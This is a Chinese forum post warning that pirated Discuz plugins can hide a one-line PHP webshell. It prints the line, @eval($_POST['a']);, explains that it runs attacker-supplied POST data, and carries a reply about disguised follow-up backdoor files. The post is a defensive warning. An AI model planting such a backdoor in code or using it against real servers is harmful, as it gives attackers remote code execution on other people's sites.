某盗版插件中惊现一句话木马，小到让你根本无法发现

𝕷𝖎𝖑𝖏𝖆𝖈𝖐 · 发表于 2023-3-29 15:43:51

马上注册，免费下载更多dz插件网资源。

您需要登录才可以下载或查看，没有账号？立即注册

×

传送门：安全小知识：为什么使用盗版插件容易被挂马！

@eval($_POST['a']);

复制代码

如上面所示，就这么短短的几个字符，隐藏在盗版插件正常代码之中，如果不细心的话，根本无法发现。
不懂php的人，可能会怀疑，这么短的一个代码，就是木马？
eval就是把普通的字符串当做php代码来执行，像上面这个代码就是执行接收到的POST数据，利用这段代码，黑客就可以向你的服务器执行代码了。
抓紧时间卸载盗版插件吧，盗版插件的安全问题已经不能忽视了！

传送门：安全小知识：为什么使用盗版插件容易被挂马！

©DZ插件网所发布的一切资源仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。
网站部分内容来源于网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请支持正版软件，得到更好的正版服务。
您在本站任何的赞助购买、下载、查阅、回复等行为等均表示接受并同意签订《DZ插件网免责声明协议》。
如有侵权请邮件与我们联系处理: discuzaddons@vip.qq.com 并出示相关证明以便删除。敬请谅解！

婷姐 · 发表于 2023-3-29 15:44:31

前排支持，拒绝盗版
如果你只要用了一次盗版插件，一句后门代码，就可以让整个网站作废

有些攻击者不是只劫持首页到非法网站上那么简单，有的时候还会用“间谍式”写入更多潜在后门入口文件，而且命名法会伪装成正常文件名称，代码可能还是加密，以免被检测，这样就可以留着以后再进行攻击，即使你这时候把盗版插件删除，也是无济于事，还是一样会被攻击，除非你把所有新植入的后门文件也都删除了，否则针对一般站长而言，想要安全，就不得不重装网站了

如果等发生以上情况再付费找人清理后门文件和维护，不但服务费成本高，也可能没法根除到底，对于如果用心经营网站的站长，千万不要选择盗版插件，也不要随意授权网站关键信息资源给第三方，如服务器，FTP等，做好及时性备份，拒绝使用盗版插件或模版